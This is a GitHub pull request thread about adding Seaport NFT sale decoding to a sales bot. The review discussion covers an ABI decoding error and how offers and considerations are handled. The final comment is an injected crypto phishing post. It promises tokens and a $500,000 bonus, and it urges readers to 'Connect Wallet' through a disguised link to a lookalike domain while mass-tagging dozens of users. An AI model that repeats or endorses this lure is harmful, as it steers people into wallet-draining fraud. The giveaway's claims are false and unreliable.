### PR TITLE
Add seaport

### PR DESCRIPTION
**Pull request by callikai**
There is probably a much cleaner way to do this, but I was not able to get ethers to play nice with the log format. I had utilized this code for slightly different purposes, so I just ported my changes back here; this is not tested.

This is what I used to calculate the hex offsets:
https://github.com/ProjectOpenSea/seaport/blob/171f2cd7faf13b2bf0455851499f1981274977f7/contracts/lib/ConsiderationConstants.sol#L142

### CODE REVIEW

**Comment by dsgriffin** [comment]
hi @callikai - thanks for this. not able to merge in it's current condition as it's untested but also - does this handle both types of sales (offers and buy-it-now's) as I know `offer` and `consideration` act a little different

**Comment by dsgriffin** [comment]
hi @callikai, thanks. I tried running this and got the following error:

```
Error: Returned values aren't valid, did it run Out of Gas? 
You might also see this error if you are not using the correct ABI for the contract you are retrieving data from, 
requesting data from a block number that does not exist, or querying a node which is not fully synced.
```

I've tried many variations for the seaport's `logDecoder` but they all return with that error.

**Comment by callikai** [comment]
> hi @callikai - thanks for this. not able to merge in it's current condition as it's untested but also - does this handle both types of sales (offers and buy-it-now's) as I know `offer` and `consideration` act a little different

Not sure. I use this in a discord bot and when I notice it misses a sale, I troubleshoot. It adds all the values of the consideration(s) so it may not work for both types. Probably need to add the offer amount as well.

**Comment by callikai** [comment]
> hi @callikai, thanks. I tried running this and got the following error:
> 
> ```
> Error: Returned values aren't valid, did it run Out of Gas? 
> You might also see this error if you are not using the correct ABI for the contract you are retrieving data from, 
> requesting data from a block number that does not exist, or querying a node which is not fully synced.
> ```
> 
> I've tried many variations for the seaport's `logDecoder` but they all return with that error.

I have the logic working in a different application, but I could have missed something when moving it over. Could be a dependency version problem as well. In the next few days I will write some tests for this if I get the time.

**Comment by slowell** [comment]
Seems the issue is with 'indexed: true' in markets logDecoder. Removed that line and it seems to be working 100%.

**Comment by Pukson** [comment]
Which line are you referring to?

**Comment by slowell** [comment]
> Which line are you referring to?

Line 27 in markets.js

**Comment by Pukson** [comment]
Yeah it works after removing that line. Something i noticed is that sales made through offer aren't shown or calculated correctly it seems.

**Comment by dsgriffin** [comment]
thanks for this - have implemented something on my side that seems to be working

**Comment by iamcameronwatson** [comment]
[Banner](https://aq-3d.wikidot.com/%0a/app.blastofflzone.com/referral/)

# Blastoff.zone: Claim Your Share of 1 Million Tokens and $500,000!

Congratulations! You've just unlocked an exclusive opportunity to claim your share of 1 million tokens and a staggering $500,000 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://aq-3d.wikidot.com/%0a/app.blastofflzone.com/referral/) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500,000 bonus.
3. Use the "Claim Now" option to secure your tokens and cash in on the rewards.

This offer is limited and won't be available for long, so act now to maximize your gains!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 1 million tokens already claimed, seize this incredible opportunity before it's too late!
eddybuilds, @marciohdo, @aranhaagency, @kemchos, @joegasewicz, @adelura, @spyros000, @EasyChris, @AcidP0ison, @GargantuaX, @bianxiang, @animasling, @X-oss-byte, @TsHristov, @suclnchoi, @Tommylovespython, @bbbwizard, @steebchen, @HR, @hletrd, @dreamalbert, @stayce, @Tower95, @endlessdev, @Pblfer, @nitishmakhija, @icetr8, @xuezhileikaku, @Max-3-7, @betrayalove, @JOEOK6, @DevilAngelos, @volkov01, @mygirl8893, @DavidCai1111, @chayilDeborah, @leftkats, @manongLY, @Shumay14, @alymbouras, @givall, @finalevil, @agungwa, @nevrax, @1771979508, @viniciuspsw, @ethersc1, @ryuqing, @preetidangi21, @eliaslebed

**Pull request closed without merging**
